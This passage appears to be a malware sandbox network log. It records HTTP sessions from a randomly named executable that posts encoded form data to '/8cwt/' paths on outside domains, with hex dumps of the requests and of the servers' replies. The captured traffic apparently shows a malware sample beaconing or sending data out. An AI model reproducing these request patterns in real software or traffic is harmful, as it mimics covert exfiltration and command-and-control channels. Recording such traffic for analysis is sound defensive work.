                                      Jun 4, 2024 14:18:29.506710052 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:18:29.506721973 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:18:29.506813049 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:18:29.506828070 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:18:29.506942987 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:18:29.506973028 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:18:29.507002115 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:18:29.507014036 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:18:29.507177114 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:18:29.507179022 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.11.304987193.125.99.134802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:31.663012981 CEST1617OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 53 57 43 37 59 37 67 4c 56 30 54 79 62 45 42 6e 6b 58 79 5a 66 70 42 35 66 62 65 4b 41 54 50 47 6d 63 36 78 6c 4c 4d 35 70 72 43 55 49 6d 4c 7a 49 37 6f 39 75 34 41 68 4f 62 4b 4c 53 6a 4e 49 63 37 47 4c 74 54 6e 39 4f 6e 56 35 61 66 32 72 2b 58 4a 4e 6c 4b 64 65 71 33 7a 72 6b 64 53 39 48 44 35 61 49 6e 37 6f 68 71 54 44 48 55 68 75 69 6f 59 6a 6b 47 63 58 31 6a 4e 4e 73 37 57 58 6a 4c 43 51 44 58 31 68 52 44 35 6e 35 66 48 61 36 73 5a 43 7a 6d 57 6f 2b 47 70 38 5a 77 79 61 53 73 78 78 71 44 55 47 65 35 46 58 41 61 4c 37 6f 63 44 71 35 57 2b 6d 7a 55 6f 6a 30 36 48 4d 36 4b 6e 7a 4e 6f 56 4d 38 73 58 6e 61 57 51 72 66 72 63 65 6c 33 52 34 51 36 44 46 7a 47 57 76 42 73 4b 68 70 79 44 6a 56 6b 59 4f 56 47 67 4b 2b 6b 2b 50 52 65 45 4d 58 6f 2b 48 67 53 4e 54 34 6a 4b 32 32 65 62 46 67 33 31 6e 4b 42 46 6e 66 77 47 43 4e 30 73 46 59 35 77 51 73 46 45 4b 67 66 32 36 47 65 4a 67 62 61 74 6b 6c 78 7a 39 45 62 7a 2f 72 47 2b 48 33 70 7a 77 33 6f 48 [TRUNCATED]
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKATPGmc6xlLM5prCUImLzI7o9u4AhObKLSjNIc7GLtTn9OnV5af2r+XJNlKdeq3zrkdS9HD5aIn7ohqTDHUhuioYjkGcX1jNNs7WXjLCQDX1hRD5n5fHa6sZCzmWo+Gp8ZwyaSsxxqDUGe5FXAaL7ocDq5W+mzUoj06HM6KnzNoVM8sXnaWQrfrcel3R4Q6DFzGWvBsKhpyDjVkYOVGgK+k+PReEMXo+HgSNT4jK22ebFg31nKBFnfwGCN0sFY5wQsFEKgf26GeJgbatklxz9Ebz/rG+H3pzw3oH73XtMzTiB7quQEV1kjn6yTKmTNDrkT3FuC6CZtdTX/EK1YkMJwVxwbRQ7Rc7wzo2tePCbYi1oAB0jh05U3gMnP4KIgHaOhcBVVlnhte4FHKEthVv2qPnpTjfq6rfNXmb0B5tFT9WxuvIr3Q2Xv2KYzReeson9ItbzmPmuG6p9xnQsI98UkU87McG497Y/QL+tHq8g5x8gpRlin0TMjFHQBNvqy8C2i79iSUBFpIZutWggZSAxKge9I20KeGrFKaUJ0IHDtlsAoTYJbn1uN1b9KP+RP3mh0xNb2ZxbXcL9hpl0aLywx/CkqqXd1KPo3v5rXn4cCztZkEoZLIaeJFElcGfc0LGzFLSY18te92wMksQ/iC2ItYGw8MVFeYTqXqmaRQDdPEV2msBgVqtnu8qliaKsc+u+zzhQkmeLazh9D7y4uwJ+kjyEzCymJyi+1BsJESjjZzmUxps7EuXMO5ojy7oomc4pmzTSphhEx4Np8SvXf5i52uwShHLADLaFEU54fdGJQWbJA7OAPIgP6YlNRVvDGFboSKT2Hf5IXZH+EBz7p98E63JAmGG6KOfY6bh2yjvRvZ+9U2Mie7n8paX0q2TLwb4TsYEcrOU5T+jiwwYVrD8/Lz/uzxQwsEx8sV6cCt10PSeexvsez+Y1VjZsaN0LzoBWU7NaJ [TRUNCATED]
                                      Jun 4, 2024 14:18:32.250478029 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
                                      Jun 4, 2024 14:18:32.250514030 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:18:32.250546932 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:18:32.250683069 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:18:32.250798941 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:18:32.250839949 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:18:32.250855923 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:18:32.250881910 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:18:32.250894070 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:18:32.250905991 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:18:32.250933886 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.11.304987293.125.99.134802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:34.440659046 CEST425OUTGET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:34.802649975 CEST549INHTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:18:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 0
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      x-redirect-by: WordPress
                                      location: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6
                                      x-litespeed-cache: miss
                                      x-turbo-charged-by: LiteSpeed
                                      Server: LiteSpeed


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.11.304987334.232.203.70802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:40.125907898 CEST674OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 78 64 48 75 35 66 43 2f 38 75 45 7a 47 42 76 63 30 36 4b 5a 4c 4c 57 74 37 49 75 36 72 59 5a 61 6e 4c 4d 61 6e 41 57 50 34 4d 32 66 43 45 76 6e 54 78 43 34 63 44 37 66 53 48 62 76 2f 46 50 59 4c 4b 54 4f 51 4f 36 58 6d 5a 58 39 41 6c 45 67 62 69 69 62 7a 77 57 34 57 49 6c 35 75 55 30 52 2b 4b 48 4a 76 56 75 31 58 43 76 77 6b 59 66 4f 73 69 53 79 42 65 53 4c 4a 7a 4e 6b 38 35 73 39 49 59 38 43 44 45 6f 41 54 38 70 6e 74 49 31 48 4b 36 51 62 32 4d 35 2b 48 37 74 55 66 34 6e 4b 39 72 6b 31 61 7a 36 36 35 38 41 54 39 67 50 71 6a 56 63 32 79 2f 38 72 4d 74 6a 75 2f 44 6b 6d 4a 51 3d 3d
                                      Data Ascii: 24eluX=xdHu5fC/8uEzGBvc06KZLLWt7Iu6rYZanLManAWP4M2fCEvnTxC4cD7fSHbv/FPYLKTOQO6XmZX9AlEgbiibzwW4WIl5uU0R+KHJvVu1XCvwkYfOsiSyBeSLJzNk85s9IY8CDEoAT8pntI1HK6Qb2M5+H7tUf4nK9rk1az6658AT9gPqjVc2y/8rMtju/DkmJQ==
                                      Jun 4, 2024 14:18:40.259381056 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:18:40.259466887 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:18:40.259524107 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:18:40.259572983 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:18:40.259602070 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
